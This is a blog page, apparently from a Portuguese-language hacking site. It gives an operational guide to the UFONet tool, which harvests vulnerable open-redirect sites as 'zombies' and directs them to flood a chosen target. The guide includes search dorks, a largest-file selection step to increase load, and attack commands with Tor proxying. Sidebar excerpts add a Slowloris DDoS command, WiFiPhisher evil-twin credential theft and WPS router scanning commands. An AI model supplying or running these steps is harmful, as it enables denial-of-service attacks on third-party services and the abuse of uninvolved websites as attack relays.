Pular para o conteúdo principal

UFONet Open Redirect DDoS Attack

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet.
ufonet
See this links for more info:
  • https://www.python.org/downloads/
  • http://pycurl.sourceforge.net/

Installing UFONet

UFONet runs on many platforms. It requires Python (2.x.y) and the following library:
- python-pycurl - Python bindings to libcurl
On Debian-based systems (ex: Ubuntu), run:
sudo apt-get install python-pycurl
Source libs:



Searching for ‘zombies’

UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites.
A common query string should be like this:
  • ‘proxy.php?url=’
  • ‘check.cgi?url=’
  • ‘checklink?uri=’
  • ‘validator?uri=’
So for example, you can begin a search with:
./ufonet -s 'proxy.php?url='
At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable.
Wanna check if they are valid zombies? (Y/n)
Also, you will be asked to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your new ‘zombies’ will be appended to the file named: zombies.txt

Examples:

  • with verbose:
    ./ufonet -s 'proxy.php?url=' -v
  • retrieve 15 urls:
    ./ufonet -s 'proxy.php?url=' --sn 15

Testing botnet

Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’.
Urls of the ‘zombies’ should be like this:
http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.

Examples:

  • with verbose:
    ./ufonet -t zombies.txt -v
  • with proxy TOR:
    ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"

Inspecting a target

This option is useful to know the best place to attack your target.
It will crawl your objetive to provide you with a URL path to the largest object (size)found in the HTML code.
./ufonet -i http://target.com
Then, you will can drive your ‘zombies’ to reload just there, doing your most effective attack.
./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

Attacking a target

Enter a target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10
This will attack the target, with the list of ‘zombies’ that your provided on: “zombies.txt”, a number of 10 times for each ‘zombie’. That means, that if you have a list of 1.000 ‘zombies’, the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.
By default, if you don’t put any round, it will apply only 1.
Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems, this will do the attack more effective.
./ufonet -a http://target.com -b "/images/big_size_image.jpg"

Examples:

  • with verbose:
    ./ufonet -a http://target.com -r 10 -v
  • with proxy TOR:
    ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
  • with a place:
    ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"

GUI/Web Interface

You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience.
To launch it, use:
./ufonet --gui
This will open a tab on your default browser with all the options of the tool.
Source && Download
ufonet download

Comentários

Postagens mais visitadas deste blog

Realizar DDos Attack usando Slowloris

Salve esse arquivo como "slowloris.pl". Download do script. http://pastebin.com/2M4ZAHpz Abra o terminal e siga os seguintes comandos:   cd Desktop                    ( o local deve ser substituído pelo local do arquivo, nesse caso se encontra no Desktop ) chmod +x slowloris.pl perl ./slowloris.pl -dns www.target.com -port 80 -timeout 1 -num 1000 -cache 1- Substitua a URL pelo endereço do alvo. 2- Nesse caso será disparado 1000 pacotes a cada 1 segundo.

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de

Como encontrar a WPS Routers Habilitados - Kali Linux

Como você poderia encontrar WPS Routers ativado?  Sério é muito fácil de encontrar WPS habilitado roteadores, mas depois que eu postei o meu tutorial sobre como cortar o WPA / WPA2 WiFi Protected muitos povos me enviado mensagens para saber como eles poderiam encontrar WPS habilitado router? por isso é muito simples e limitado a um comando único sim, vamos usar o comando de lavagem para esse fim. O comando que podemos utilizar para encontrar WPS habilitado roteadores está abaixo. wash -i mon0 -C Tenha em mente que o "C" neste alfabeto "C" deve ser a capital Também tenha em mente antes de entrar este comando por favor ligar o interface de moniter ou este comando não funciona mais assim para que você moniter tipo de interface o comando abaixo primeiro e depois tentar digitalizar routers WPS habilitados. airmon-ng start wlan0  Agora isso vai lhe dar todos os roteadores que possuem botão WPS / push ativado em cima delas e você pode tentar cortar-lhes a seu p